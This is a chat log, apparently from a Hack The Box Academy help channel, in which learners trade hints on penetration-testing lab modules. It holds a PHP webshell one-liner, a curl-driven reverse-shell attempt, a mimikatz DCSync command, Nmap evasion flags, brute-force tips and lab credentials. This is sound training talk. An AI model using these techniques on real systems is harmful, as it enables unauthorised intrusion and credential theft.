Weird if it's not accepting your answer
... OMG ||Yeah it is!
just Global||,
Thank you so much really!
Currently stuck on the PtT from Linux section I cant seem to find an answer to "Use the LINUX01$ Kerberos ticket to read the flag found in \DC01\linux01. Submit the contents as your response (the flag starts with Us1nG_)." - Anyone have any tips?
If you're still stuck, (a) don't overthink it, (b) using the hint may well come in handy, and (c) use the cheat-sheet. If still-still stuck, feel free to DM me.
@west canopy
Maybe you can take a look here when you get a chance? What am I doing wrong? Actually it is a step-by-step guide in the module. Why is the answer not accepted?
I'm having a hard time on the SQL part of Attacking Common Services. I can log in using the given creds with impacket, but even after enumerating EVERYTHING that I have the privilege for I can't seem to find ||the hash for the mssqlsvc user||
Can someone help me pleeeease π
|| Responder || is your friend
hi, for "AD Enumeration & Attacks - Skills Assessment Part I" question 3: Crack the account's password. Submit the cleartext value.
I have uploaded PowerView and mimikatz, but when I run them, nothing happens.
I have done this in my rev shell and also in the webshell. Any hints on this?
SOLVED: I used another tool instead, not sure why mimikatz is not working
No I solved it. Thanks for the offer.
The Live Engagement Sections! Do you have any hints? for that sections
Shells & Payloads module
I tried to upload the shell but it still doesn't work
Spawning the target what does it mean
The targets are usually (most of them) offline; spawning will start the target so you can access it
@autumn pilot will you please elaborate, because I am not that good at English
means that you are powering on the target
Powering means attacking right
No, you should start the target server
spawning means start the target
hello everyone, I need help with one small thing. I have a PHP file on the server, and I need to get a reverse shell using curl. I used revshell. I'm doing this: curl http://10.129.104.61/1php.php?cmd=<SNIP>, and in there is my PowerShell in base64 to get a shell, but it's not doing anything. What is missing? PS: I have an nc listener ready to get the connection. Thanks for your attention.
I want to identify the services running on the target box with nmap but I keep getting:
Failed to resolve "144.126.228.127:32165".
WARNING: No targets were specified, so 0 hosts scanned.
Nmap done: 0 IP addresses (0 hosts up) scanned in 0.03 seconds
I'm on a VM and I've just connected to HTB VPN.
I can render "144.126.228.127:32165" in my browser but can't nmap it?
What am I missing here?
you cannot put ip:port; if you want a specific port, use nmap -p 32165 144.126.228.127
hmm trying it now
I get something similar:
```
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-23 12:55 WEST
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.33 seconds
```
try -Pn etc
oh wait it's going somewhere now with the -Pn option
You don't have to nmap that target
weird, I tried using it a while back but it was stuck
wdym? how do you identify the available services?
by simply visiting the target
the page does render you're right ... thought I had to nmap it though
how do I know which is the right epoch time??? and is this script usable?
So you can tell that WordPress powers it whenever you visit that page... if I run 'whatweb 144.126.228.127:32165' I can tell it's running WordPress 5.6.1. The only exploit I found on wpscan.com, without a fix, was an authenticated Blind SSRF via DNS Rebinding. I can't find this exploit in metasploit, and if I search for wordpress within metasploit, I get a few dozen of them. Do I have to try them all?
Just finished the Intro to Assembly Language. Annoying but very satisfying.
do I even have to use metasploit and/or look for wordpress exploits or nah?
I mean you technically never have to use metasploit, but it's way easier if you do for some stuff
It could also be that wordpress is not the thing that gives you a foothold here.
what's confusing me right now is that I'm trying stuff and that same stuff doesn't get me anywhere
Thats normal
What module are you working on ?
yeah, WordPress doesn't seem to be it... I'm trying a simple backup exploit but I'm only getting
```
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
I think I'm supposed to get a file or something not sure
Do you need to do it that way or do you just need to get a reverse shell?
That wasn't addressed at you xD
my bad
Let's take this to DM, I will start the service and we can talk about it
Just finished attacking web applications with ffuf, if anyone needs help feel free to dm me π
hello, I was trying to register, but every time it says the email does not match because the one I'm using ends like this: @icloud.com. Can someone help me?
What email? @latent crane
Perhaps you use "Hide my email address", which is a privacy option from Apple; try turning that off
What setting is that called
I'm talking about the type of setting
This is what shows me
it says forbidden
403 unauthorised what do I do now?
Can I get some help with an Intro to Python 3 question?
The first iteration.
What is the 3rd most used word on the exercise target website.
Do I not need the parrot terminal?
I talked to a guy that already did it, and he told me that I need to use revshell to get an encoded PowerShell to use with the PHP file that is already on the server. The PHP file has "<?php echo shell_exec($_GET['cmd']);?>"
For more context, this is for Attacking Common Services - Easy.
AFAI remember || a simple php reverse shell || will do the trick just fine.
Do I have to download python 3 onto the hack the box instance?
Like using the one that already exists to create another one that will give me a reverse shell ?
you can use python3 to run python 3
In the mate terminal?
Okay I think I got it.
nice π
```
hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list
clBuildProgram(): CL_BUILD_PROGRAM_FAILURE
- Device #1: Kernel /usr/share/hashcat/OpenCL/shared.cl build failed.
```
If you can upload a php just upload a ||php reverse shell||
hello all, is anyone else facing this hashcat error?
not fixable for now.
either use US pwnbox or your own
thanks for letting me know, i will fire up my own virtual machine
I can put the PHP file there using a MySQL command, and if I try to put something more complex (; " ' > <) it gives me a syntax error
You did the Attacking Common Services - Easy lab?
Nevermind Im lost.
@manic magnet can you help me please?
Hey guys, can anyone help me with the Local File Inclusion skills assessment? I've managed to get to the admin panel and can read the access log and, supposedly, am able to poison the log with the PHP webshell used throughout the module, but once I send it, the log just seems to freeze up and eventually crashes and I'm forced to restart the machine
I've tried alternatives too, like doing ['cmd=id'] or just ['id'] but nothing is working
I'm in the Active Directory Enumeration and Attacks module and I'm stuck in the Privileged Access section. I thus far haven't been able to get any of the commands to work. The provided script for BloodHound doesn't work and won't search for any other users in the Local Admin and Execution Rights group. Does anyone have any suggestions on what could be wrong?
The log file uses double quotes. You should not use double quotes in your payload.
I think Iβve used single quotes too but Iβll try it again
I have no clue what I did differently this time but it worked
Thank you
Take a close look at the log file. It uses double quotes. If you use double quotes in your payload, then you are changing the structure. Your payload will be torn apart.
Thank you, im putting that in my notes
Just finished the CrackMapExec module, kudos to @acoustic owl for the nudge
If someone is in need, don't hesitate to DM me.
where are you lost ?
Yeah I did
I have the target spawned and I put the code in that it tells me to but it says theres an error. Hold on.
Can you dm me the section you are stuck on ?
Can someone nudge me on the Footprinting easy lab? I haven't found anything yet, sadly.
What switches are you using with your nmap scan?
I see where the problem is. I did not use mysql I used another method. There is more than one way
-sV -sC -A. Also tried running some --scripts against each service as well.
Have you tried disabling host discovery?
yeah but the results seem to be the same
You're running it with the other switches and still not getting any results?
I mean, I have results. I guess I'm just not sure what I should be looking at.
Based on what is open, I assume I need to try and log into FTP or SSH but nothing is pointing to how
Hello, I am stuck on the Nmap module --> Firewall and IDS/IPS Evasion Hard Lab.
I found ||the hidden port 50000|| but it's always filtered.
I tried
||to access it from the same subnet -> sudo nmap -p 50000 -sS -sV -Pn --disable-arp-ping -S 10.129.2.40 10.129.2.47 -e eth1|| But without -e it says that it doesn't know which network interface to use; I tried every network interface (tun0, eth0, eth1) but it says failed to determine route to 10.129.2.47
Can someone help me with the Getting Started module -> Privilege Escalation
I cannot for the life of me find how to solve it
Currently stuck on the PtT from Linux section I cant seem to find an answer to "Use the LINUX01$ Kerberos ticket to read the flag found in \DC01\linux01. Submit the contents as your response (the flag starts with Us1nG_)." - Anyone have any tips?
The hint says "There is a file containing the credentials of Linux machines in Active Directory." but i can't seem to find an answer
DM me.
There's a specific wget command that you then need to run in order to exploit ftp. I hope that helps.
DM you? You need to DM me since I can't DM you, in case you still need help
Hey π awesome people of the galaxy, quick stupid question. I was working on "Footprinting Lab - Easy". I was able to solve it with the help of the hint provided. Now the question is: was I supposed to find the password for user ceil? I spent almost half a day trying to figure out credentials, but after reading the hint and using those credentials, it was easy. So was I supposed to brute force for credentials? Was that part of this lab?
Hi, need help on the Active Directory Enumeration & Attacks
with this question... the other questions were kinda easy but this makes no sense
"What is the ObjectAceType of the first right that the forend user has over the GPO Management group? (two words in the format Word-Word)"
--source-port 53
You don't need to proxy or anything crazy
Hey folks
Can I get a hint for login brute forcing service login first assignment?
I have bruteforced the life out of SSH and no luck, also looked into forums and it seems like most people are stuck on the first assignment. I can help with the first one if someone can help me with the second.
Is there a different service you can brute?
I didn't even look π¦
I was focused on SSH, I will have a quick peek now
but thing is, it's about my wordlist
idk, I'm not home, I'm at my workplace starting my shift in an hour ¯\_(ツ)_/¯
That's okay, have a nice time
I won't π
Is it hard work?
Retail
Right, people stuff
Hello, I'm currently doing the new Windows Attacks & Defense module. I'm trying to connect to the domain eagle.local with a given user. Can somebody tell me what I'm doing wrong? Or what the options provided mean?
I chose xorg -> username: "eaglebob" password: "givenpassword"
guys, any help with AD Skills Assessment 1? I have some error with the chisel tool
Here it is explained how you can connect via RDP
https://academy.hackthebox.com/module/176/section/1754
But you still need the flag /cert-ignore
$ xfreerdp /u:eagle\\bob /p:Slavi123 /v:TARGET_IP /dynamic-resolution /cert-ignore
Can you provide me with programming tips? I am new to programming
Use PowerShell ISE for this one and PowerView again.
So use Powerview for the GroupSID for GPO Management?
Yes, I believe that's right. You can DM me if you're still having trouble with it.
Can you DM me? I don't understand what I am supposed to do with wget.
Unable to get the connect.php file to upload successfully... has anyone else run into this, and is there some trick to getting it to work for the PHP Web Shells question #2?
M: Attacking Common Services; S: Easy Lab; I got username f**** and, based on the hints, I am using the r**** wordlist and hydra. I'm using pwnbox but it looks like it will take up to 237 hours to go through the wordlist. Any recommendations? π«
They provide also a password wordlist π
Module : Corporate Osint, Q1
I got the wrong coordinates on Google and don't get any relevant results.
Can anyone help me, I'm stuck
Yeah same problem
Also, if it takes too long it's probably not the right way to go. Usually it's less than 2-5 min of bruteforcing
mostly the easy labs which aren't easy. π
I would say that's normal, because some questions are just absurd
TRUE π
Not everything but some
let me check
I think it was alright. Some minor stuff but I mean the thing is the questions as I said are sometimes confusing
Heeey. Seems I'm also stuck on the "Identifying Filters" section.
It's about
Which of (new-line, &, |) is not blacklisted
I did try other operators from the cheat sheet and from the previous section, URL-encoded. Still no luck. Can you nudge me please?
EDIT: unstuck)
I mean, that's why you are on a learning platform. If you could do them easily every time, then why would you be here learning it
I mean yeah but like remember that these people do this stuff for months or years.
can someone help with the SQLMap Essentials module skills assessment? I can use sqlmap and it says it's vulnerable, but I get the error "unable to retrieve the database names"
You're on the right track. Skimming through the "Bypassing Web Application Protections" section really helped me.
do i need to add a ||tamper||?
yup
ill try it thanks!
I just looked it up you are on the right track with that user and wordlist. Just keep trying stuff ^^
ok, thanks for the advice! I'll just "try harder" π
is anyone having difficulties using RDP to connect atm? I am doing the 'LLMNR/NBT-NS Poisoning - from Windows' section of AD Enumeration and Attacks
i have reset the machine 3-4 times
Some other general tips:
Bruteforcing may lead to being banned, blocked or rejected. This means that sometimes restarting the service helps.
Also, sometimes other tools help. Looking through the section might reveal a better tool
Sometimes the tools are too fast and get blocked, so playing around with the connection timing is key
(These are general tips as said, not everything might be needed to be successful in this module)
found this when searching for the error
maybe it helps
nope ;-;
able to RDP in
get DC'd 30 seconds into the box
Because I just was talking about the Attacking Common Services Easy Lab. Anyone here that finished it and wants to talk about it because there are apparently 2 solutions and I want to know the other one (dm me if so π)
OK after some looking around I am pretty sure to know both ways now
was anyone able to complete the footprinting easy lab without the hint on the creds? Curious about where they were.
can someone help me with the last question of Intro to Python 3?
this thing is starting to piss me off
i just skipped what i had problems with
also, sometimes with SSH I have trouble typing in the terminal if I have alt-tabbed
why's this
I did exactly what hack the box told me to do and it won't take any of my answers
||the ftp server has the owner's name so you can assume that is the username, then password guessing using seclists can get you the access||
bro, can anybody help me report a server, because idk how
reporting a module?
Not the place
Using Web Proxies > Burp Intruder
I have the correct setup to enumerate the webpage, but when I navigate to the supposed page with the flag through Firefox, it's blank. Where else am I supposed to look for this flag if it's not present on the page?
Also, the training expressly mentioned navigating to the /admin page to make sure it is reachable, and no matter where I go or how many times I refresh the target, it is blank.
Thoughts?
Thanks in advance.
hi everyone :)! awesome new Windows module!!! I saw that it mentioned ESC8 in the description, but I don't see it on the list of things on the right (I only see ESC1). Is this normal?
In the Windows Attacks & Defense module, has anyone been able to RDP to PKI? I tried spawning the lab multiple times, waited for over 30 minutes each time but still can't RDP and PKI doesn't respond to pings
I'm able to perform the attacks though but not able to RDP into it to view the logs
ESC8 is discussed in the skill assessment section
ah great thanks π
i just used the attack in a lab and was eager to learn more about it
wish I could help but I just started the module π¦
Ugh... I think you're right about the service closing out or banning me. Someone pointed out it's not too far into the wordlist and I just needed to reset the service until I got the password. Thanks for your suggestions!
no worries. I finished all the attacks anyway, but I'm curious to try the blue team aspect of this attack π
nice π
❤️ htb academy π
Disregard... The options setting for "Exclude HTTP headers" is what got me
Stuck at the nmap scanning firewall medium lab. Whom can I DM? Or any clues, please?
What type of nmap scan flag will give the version? Reminder, you may have to be stealthy @fierce pier
I am using --source-port 53 or 80
And -sSU
Decoy method too
None of them working
yes, using dns-nsid too
What is the nmap flag to do a Version scan
nmap -sV
Ok trying now
Also the -sS is not needed (-sU part though I believe is)
My only notes for this is the command used lol
AD Enumeration and Attacks finished! What a great and challenging skills assessment. On to the next module!
@fathom pendant thank you very much. Your tips were very useful. I forgot to add -sV and solved it now ππ
Guys, is it possible to use hashcat in virtual instances to crack offline passwords?
And would it be fast?
It's possible, fast? Meh
Can someone confirm if the answer for the module ATTACKING COMMON APPLICATIONS, section Attacking Thick Client Applications, is right?
The answer I found is not working at all.
```csharp
public static void Main(string[] args)
{
    string value = " \r\n ____ __ __ ____ __ \r\n / __ \\___ _____/ /_____ ______/ /_ / __ \\_________ ______/ /__ \r\n / /_/ / _ \\/ ___/ __/ __ `/ ___/ __/ / / / / ___/ __ `/ ___/ / _ \\\r\n / _, _/ __(__ ) /_/ /_/ / / / /_ / /_/ / / / /_/ / /__/ / __/\r\n/_/ |_|\\___/____/\\__/\\__,_/_/ \\__/ \\____/_/ \\__,_/\\___/_/\\___/ \r\n \r\n by @HelpDesk 2010\r\n\r\n\t\t\t";
    Console.WriteLine(value);
    Process process = new Process();
    process.StartInfo.FileName = "c:\\windows\\system32\\cmd.exe";
    process.StartInfo.Arguments = "/c sc.exe stop OracleServiceXE; sc.exe start OracleServiceXE";
    process.StartInfo.UserName = "s.............le";
    process.StartInfo.UseShellExecute = false;
    SecureString secureString = new SecureString();
    string text = "#ora..........s3rV1..........10";
    checked
    {
        <SNIP>
```
Use username:password format
Grav default password
Friends, help with two questions in the Windows Attacks & Defense module:
1. Credentials in Object Properties. Connect to DC1 as 'htb-student:HTB_@cademy_stdnt!' and look at the logs in Event Viewer. What is the TargetSid of the bonnie user?
2. Print Spooler & NTLM Relaying. After performing the previous attack, connect to DC1 (172.16.18.3) as 'htb-student:HTB_@cademy_stdnt!' and make the appropriate change to the registry to prevent the PrinterBug attack. Then, restart DC1 and try the same attack again. What is the error message seen when running dementor.py?
remove -n WandaCalverton
I don't understand?
Remove -n in your echo command
did my comment get removed? I can't see it anymore
yes, since it partially included the answer and would be a spoiler to someone who is trying to solve it as well
You can solve your problem by simply removing the -n from your code
I did already... What I was trying to ask was, if I want to post my problem, should I DM any of the moderators my problem?
you can post your problem here; however, try explaining it rather than just pasting the whole thing
ACTIVE DIRECTORY ENUMERATION & ATTACKS
DCSync
```
mimikatz # lsadump::dcsync /domain:INLANEFREIGHT.LOCAL /user:INLANEFREIGHT\syncron
[DC] 'INLANEFREIGHT.LOCAL' will be the domain
[DC] 'ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL' will be the DC server
[DC] 'INLANEFREIGHT\syncron' will be the user account
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
ERROR kuhl_m_lsadump_dcsync ; GetNCChanges: 0x000020f7 (8439)
```
Can someone tell me why it fails
do you have the necessary privs?
Do i need admin creds for it or?
you need to have the following privileges Replicating Directory Changes All and Replicating Directory Changes
Ok.Thanks
is that from enum & attacks module dcsync section?
interesting. Thanks for the info, I'll try again and see if I can find it. I did try some brute forcing but only a few wordlists, including the footprinting one they provided.
the footprinting list doesn't have the username inside; I had that same problem too. Just assume users are stupid π
Is there a way to stop the academy target machines? I did some work early in the day and want to come back later, but I see a target lifetime ticking down. I haven't extended it, so if it reaches end of life will I be able to start it back up later?
Have you tried to refresh the page
Yes. Dropped VPN and logged out/in to the Academy site too
You can just reset academy targets later on or start a different section
Some modules use the same targets
ACTIVE DIRECTORY ENUMERATION & ATTACKS
I always get "bad JSON format" when I want to open my output from SharpHound with BloodHound
Did anyone have this before
Hello Community,
I need some good inputs.
I am preparing for eJPTv2 and was wondering if Hack The Box would be a good source? If yes, could someone suggest some machines on Hack The Box for eJPTv2 practice?
Yes, however this isn't the place to ask; #careers-and-certs is better
- https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
- you're going to want to change your name #rules #welcome
can we mention in this server?
thanks
What do you mean "mention"
Hey guys,
I'm stuck at Password Attacks - Password Reuse / Default Passwords.
I've got the credentials for user sam from the previous challenge. I used them to log in to the machine. In user kira's home directory, I found a zip file that I've cracked and got an unrequested HTB flag. I also found her private key but I can't download it with a python server and wget as it says "file not found". I couldn't get kira's password using hydra and the resources provided in the module either. Apparently there used to be a hint in the module but it's been removed.
I'd appreciate any hints or nudges on how I should proceed with this challenge.
Yes. But don't do it randomly. Even if your question has been answered by them or they're active
i will not get ban na
Her password is in the mutated password list
@fathom pendant
Don't do this. It's annoying
ok
There is a list that was mentioned in the section which you can use
That's good to know. Is there a way to speed up the cracking? For sam, I actually followed the advice to remove the top 17k lines :/
I don't think her password is in there but I could be mistaken
the credentials for MySQL don't need to be mutated
The top 17k
I am a script kiddie hacker
In fact MySQL can be found in some interesting history
Congrats: we really don't care lol
what cpts
@fathom pendant & @autumn pilot thank you guys, I'll go try that, I sense an incoming facepalm moment ((:
https://academy.hackthebox.com/preview/certifications/htb-certified-penetration-testing-specialist #cpts
clear
I always get BAD JSON FORMAT when I want to open my output from SharpHound with BloodHound
I tried bloodhound-convert
But it didn't work
Has anyone done the Windows Attacks & Defense? Does the module show and make you do the attacks or only how to defend against them?
Probably attack side not sure how they'd lab the defense unless they have 2 machines for sections (attack/defense)
The module shows both. You perform an attack and then you examine this attack. The module shows how to detect an attack and how to defend against it.
@sweet roost don't randomly dm me
Can anyone explain the roles system?
Thanks a lot! That could be added to the question π
Can anyone explain the roles system as well as suggest a first path for me?
I can suggest a first path. Start with Information Security Foundations.
Oh thank you so much, can you explain roles too?
Nice
The roles are tied to http://app.hackthebox.com #welcome explains it
Oh I see! Thanks for the help
sorry for inconvenience
god the DNS section in footprinting really jumps into things
Did you maybe mean the 'job roles', in the academy?
No no i meant discord account roles
Ah, okay
Is there anyone who has completed Busqueda right now?
ACTIVE DIRECTORY ENUMERATION & ATTACKS
Module Privileged Access
What other user in the domain has CanPSRemote rights to a host?
MATCH
I've tried to look in BloodHound for the user with this Cypher query (the `*` of the variable-length relationships had been eaten by the chat's markdown):
MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]->(g1:Group)) MATCH p2=(u1)-[:CanPSRemote*1..]->(c:Computer) RETURN p2
It just shows one user, forend; it's still wrong
Why?
Nmap labs are pain.
thank you very much
Hi guys, I'm doing the Getting Started module. When trying to run Nmap or GoBuster on the Web Enumeration section I'm not getting any responses. Prompt I get from GoBuster: Error: error on running gobuster: unable to connect to http://161.35.36.167/: Get "http://161.35.36.167/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
And prompt from nmap: Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-24 20:35 CEST
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.32 seconds
When I use the IP address in a web browser I'm getting the home page of the assignment
What is the problem?
use -Pn as instructed
just wait bro
for the fingerprinting
xd
I need help with the Metasploit module in Shells & Payloads.
I can't scan the machine or anything
so idk what CVE I need to use in Metasploit
Same here i can't scan the machines with nmap or use GoBuster.
yeah same
maybe it's HTB
I didn't know that terminating my pwnbox would prevent me from continuing to work :/ I was having issues connecting to the target so I terminated it and I really wanted to do some learning today
I think it's HTB
I have problems connecting too
idk why
my pwnbox crashes a lot
For gobuster scan you also need to use the specified port they give you, nmap is going to be useless against any/most machines that don't start with 10.x.x.x
hello all, password attacks module, credential hunting in linux section......
I tried the hint username and password and that didn't work
I tried using the username.list and password.list and it didn't work
I appreciate any tips
did you manage to find kira's password ?
I tried brute forcing kira's password with the password.list file
and that did not work
I'm thinking of using custom.rule on the password list but that will take a really long time
In kira's section, the hint gives you a direct indication about the password, but obviously it doesn't work directly; maybe you can reform it and customize it in a way that will work
Hi, I am stuck on the last question of "Bloodhound - Skills Assessment", Q: Find the percentage of users with a path to GLOBAL ADMINISTRATOR. Submit the number as your answer (to two decimal points, i.e., 11.78). Been stuck for like 2 hours, I don't know if I imported something wrong
tried cracking the mutations of the password mentioned in the hint but no luck also
Hi, I'm trying to open the file /upload.php in the last question of the chapter "FILE UPLOAD ATTACKS" and I don't understand why I don't see the file; I use the right technique "XXE + php filter". The file gives a good response 200 but it doesn't return anything.
DM me ty.
Hi, I have trouble making the nmap smtp-enum NSE script work for the module FOOTPRINTING - SMTP. May I talk with someone who has finished this part in private about this?
Hey all, I am a cyber security student in Canada that wants to grow & learn here at hackthebox .....glad to be here π
dm me
hi can someone tell me what I'm doing wrong here? I am wondering if this is just because I did this module on my local machine
I have finished Attacking Common Services except for Attacking DNS
Can I DM someone about it?
The instructions of the section I'm doing:
Create a "For" loop that encodes the variable "var" 28 times in "base64". The number of characters in the 28th hash is the value that must be assigned to the "salt" variable.
Here is my code:
```bash
#!/bin/bash
# Run with: bash for-loops   (or chmod +x and ./for-loops)
# Running it with "sh" uses dash, which does not know the bash-only
# "function" keyword, {1..28} brace expansion or [[ ]]; POSIX forms are used below.

# Decrypt function: reverses the obfuscation on $hash, then AES-decrypts with $salt
decrypt() {
    MzSaas7k=$(echo $hash | sed 's/988sn1/83unasa/g')
    Mzns7293sk=$(echo $MzSaas7k | sed 's/4d298d/9999/g')
    MzSaas7k=$(echo $Mzns7293sk | sed 's/3i8dqos82/873h4d/g')
    Mzns7293sk=$(echo $MzSaas7k | sed 's/4n9Ls/20X/g')
    MzSaas7k=$(echo $Mzns7293sk | sed 's/912oijs01/i7gg/g')
    Mzns7293sk=$(echo $MzSaas7k | sed 's/k32jx0aa/n391s/g')
    MzSaas7k=$(echo $Mzns7293sk | sed 's/nI72n/YzF1/g')
    Mzns7293sk=$(echo $MzSaas7k | sed 's/82ns71n/2d49/g')
    MzSaas7k=$(echo $Mzns7293sk | sed 's/JGcms1a/zIm12/g')
    Mzns7293sk=$(echo $MzSaas7k | sed 's/MS9/4SIs/g')
    MzSaas7k=$(echo $Mzns7293sk | sed 's/Ymxj00Ims/Uso18/g')
    Mzns7293sk=$(echo $MzSaas7k | sed 's/sSi8Lm/Mit/g')
    MzSaas7k=$(echo $Mzns7293sk | sed 's/9su2n/43n92ka/g')
    Mzns7293sk=$(echo $MzSaas7k | sed 's/ggf3iunds/dn3i8/g')
    MzSaas7k=$(echo $Mzns7293sk | sed 's/uBz/TT0K/g')
    flag=$(echo $MzSaas7k | base64 -d | openssl enc -aes-128-cbc -a -d -salt -pass pass:$salt)
}

# Variables
var="9M"
salt=""
hash="VTJGc2RHVmtYMTl2ZnYyNTdUeERVRnBtQWVGNmFWWVUySG1wTXNmRi9rQT0K"

# Base64 Encoding Example:
# $ echo "Some Text" | base64

# For-loop: encode $var 28 times. A shell assignment has no "$" on the
# left-hand side and no spaces around "=", otherwise the shell tries to run
# the current value of $var as a command.
for i in $(seq 1 28)
do
    var=$(echo $var | base64)
done
# The number of characters in the 28th encoding is the salt
salt=${#var}

# Check if $salt is empty
if [ -n "$salt" ]
then
    decrypt
    echo $flag
else
    exit 1
fi
```
Can someone help me out here?
thanks btw
I typed this up on my local machine and it's saying I am calling a function that does not exist.
and I am getting a syntax error:
greg@greg-IdeaPad-5-15ARE05:~/Documents/htb bash$ sh for-loops
for-loops: 4: function: not found
error reading input file
for-loops: 22: Syntax error: "}" unexpected
greg@greg-IdeaPad-5-15ARE05:~/Documents/htb bas
could someone please DM me? thanks
Did you figure this out? I'm having the same problem for doing this question π¦
Hi guys, can someone please help me with the footprinting lab- Hard, I'm in the home stretch but I can't login to mysql with tom's credentials.
I did finish this module, but I can't remember the whole details of
it
You can DM
sure, thanks
SOLVED!!
@spiral prairie please do not DM me, I had not requested or given permission.
Has anyone solved the bloodhound room?
Hi, is there anyone I can DM to get help with a module?
I'm thinking of getting the help later tonight maybe?
thanks
I need help with the Intro to BASH module's for-loops section exercise
I was stuck and felt the same way. However, when I looked at the onesixtyone screenshots in the snmp module again, it clearly showed that we need to use the contents of the brackets
can someone help me with shells and payloads module
please
been stuck on this the whole day
π
Hi, can someone help me with the Intro to BASH module's for-loops section? I need someone to help me with my code
please let me know
It is a community string... Community strings can be anything... Also read the intro to this hard lab
It tells you a LOT of what you need to know
Comm strings aren't always "private","public"
@rustic sage syntax from my notes is braa <comm string>@IP:.1.3.6.*
You can also just snmpwalk -v2c -c <comm string> <IP>
Also your screenshot contains a spoiler
What gives you any reason why it wouldn't be the case?
In the AD-Bloodhound Module, Nodes section, it is asking me what non-default GPO affects all users. I feel like I am missing something here; nothing I input works. I have looked at the User Objects then users@inlanfreight.HTB, Extra properties and everything else I can think of. Can someone give me a pointer on this please?
If you want during a weekend or a day I'm not at work I can hop on VC to walk you through how I boil the questions down to important details
Rn I am sleepy
Glhf
Nobody ? Ty
If you ask a question you must specify module and section. You specify module, but no section D:
Hmm sorry, it's my first request; the section is « Skills Assessment » and the module is « File Upload Attacks ». Ty for your response
Before jumping straight into RCE, try to simplify it by seeing if it will execute the code that you have specified
Just an echo of a string of text would be enough
Did you check using the ||.svg|| extension? Remember that you might be able to read .php files that might be in base64
Remember to always try to get the source code for .php extension, for example, for upload.php and all the files that upload.php could require. For example, if upload.php needs example.php try to also get the source code and so on... If you do that you will get an interesting file that tells you how the backend works and it's way easier
The question and hint in the Broken Authentication - Default Credentials need to be reworded ... it guides you to using the python script with the SCADA Pass list but the answer is not even on the said list
Alright thanks for the replies!
if you mean perks - yes, you will be able to access other channels
verify and you will see them
I solved the nmap easy lab using || --script discovery||. Is this the way or is there any other way as well?
Most of the time was spent solving the easy lab. Medium and hard took only 10-20 minutes.
Adhd held me back from completing this module, but I did it. fΓk you adhd.
Hi, there are always other ways to solve a "problem"; most of the time I've seen people reaching the goal by taking another "path". I did it in another way, for example, and if you search in the forum you may notice that others did something different too
...we can run a full TCP port scan using the command nmap -p- --open -oA nibbles_full_tcp_scan 10.129.42.190.
...We can leave this running in the background and move on with our enumeration.
How do I leave a full TCP port scan running in the background and know when it's finished? Do you just open a new tab and let it run?
I have a problem with Broken Authentication - Predictable Reset Token - Question 1, I cannot recreate the md5 hash for the user for some reason. I convert the timestamp into milliseconds and append it to the "htbuser" string. I should get the given hash, but for some reason it does not work.
I think you need a script to go + and - the time in milliseconds. So you need to calculate hashes for + / - like 1000 milliseconds and then automate the checking of the tokens for each calculated token.
Thanks, I stumbled on a forum post that said that I need to convert the GMT time to my UTC+3 time zone and got it working
but it doesn't work if I click submit. edit: nvm, it was buggy, I got it
check the hint
Hello, at the Starting Point, I should download a VPN package; for the machines, should I download a different VPN package?
Machine tags are disabled. You can enable them in your profile settings.
what does this mean?
hi
maybe i'm just being privileged, but i feel as if it really glossed over actually explaining DNS
Hi, can someone give me a hint on Skills Assessment Part 1 - Windows Priv Esc, task "Escalate privileges and submit the contents of the flag.txt file on the Administrator Desktop", on how to escalate the privileges? I used a couple of techniques but did not figure out how to gain NT AUTHORITY
like it went in with no context expecting to understand nameservers zones etc
Privileged Access
I only get the forend member
Get-NetLocalGroupMember -GroupName "Remote Management Users"
Get-DomainGroupMember -Identity "Remote Management Users"
Here i get the member bdavis
Why doesn't Get-NetLocalGroupMember show me this member?
Yes, the module assumes some knowledge of DNS. It is not a DNS basic knowledge module.
If you have any problems, contact me by DM. Then I'll help you further
Have you made any progress on your modules PayloadBunny?
Yes, I'm making progress, but a next module seems to be in the wings already
Kerberos Attacks will probably be the next module that will be released
HackTheBox writes modules faster than I can learn π
hahaha
I told my wife that was why I was so frustrated. Trying to finish off all the modules, and they keep making more of them!
I Wan ad path
HackTheBox simply ensures that you never get bored
Yeah, but I've got other stuff I want to study too, and I've been holding off till after I finish HTB. heh. i.e. Learning German, and upskilling my mathematics knowledge.
Hi guys, hope you're doing well... can someone please give a hint on how to solve case #11 in the "SQLMap Essentials" module (it's part of the "Bypassing Web Application Protections" section)
Anyone know why the command rdesktop -u htb-student -p Academy_student_AD! <TGT IP> would result in a login error telling me the creds were invalid while xfreerdp /v:<TGT IP> /u:htb-student -p Academy_student_AD! works? The two programs are just rdp clients. Shouldn't they both login?
Because of the exclamation mark.
Linux is interpreting that as a special character, not part of the password.
It works on xfreerdp because it's the last character in the command, while your rdesktop command has it in the middle.
Try putting the password inside quotes.
It should go like this xfreerdp /v:<TGT IP> /u:htb-student /p:Academy_student_AD!
I am having such a hard time having a stable RDP to my target. It drops after less than a minute
Oh right, sorry. I actually did use that command for xfreerdp. So it does login correctly using xfreerdp, but when I try with rdesktop it tells me the creds are wrong. I was just wondering if there's some discernible reason for that. (Assuming that the command syntax and creds are right.) rdesktop will login to the windows machine, it will then give that screen where it says the credentials were incorrect and you can try again.
I never use rdesktop, but maybe put the password in quotes?
Sorry to do this to you bro...
stay tuned π
Yeah, I tried single and double quotes for the password, doesn't seem to fix it. I know it's connecting because it brings me to the windows login screen to try again. I'm not going to worry about it too much more since xfreerdp seems to work.
Oeeh that looks very interesting! I hope they will do the offensive as well as the defensive side π
I am planning to buy PowerView + BloodHound modules for CPTS
If I may recommend one more module to you, check out the Crack Map Exec module.
You want to learn german? That's cool. π
Yes. I can only speak a little German. π¦
Every additional language you learn is cool.
Python! π
Your German might be better than my English π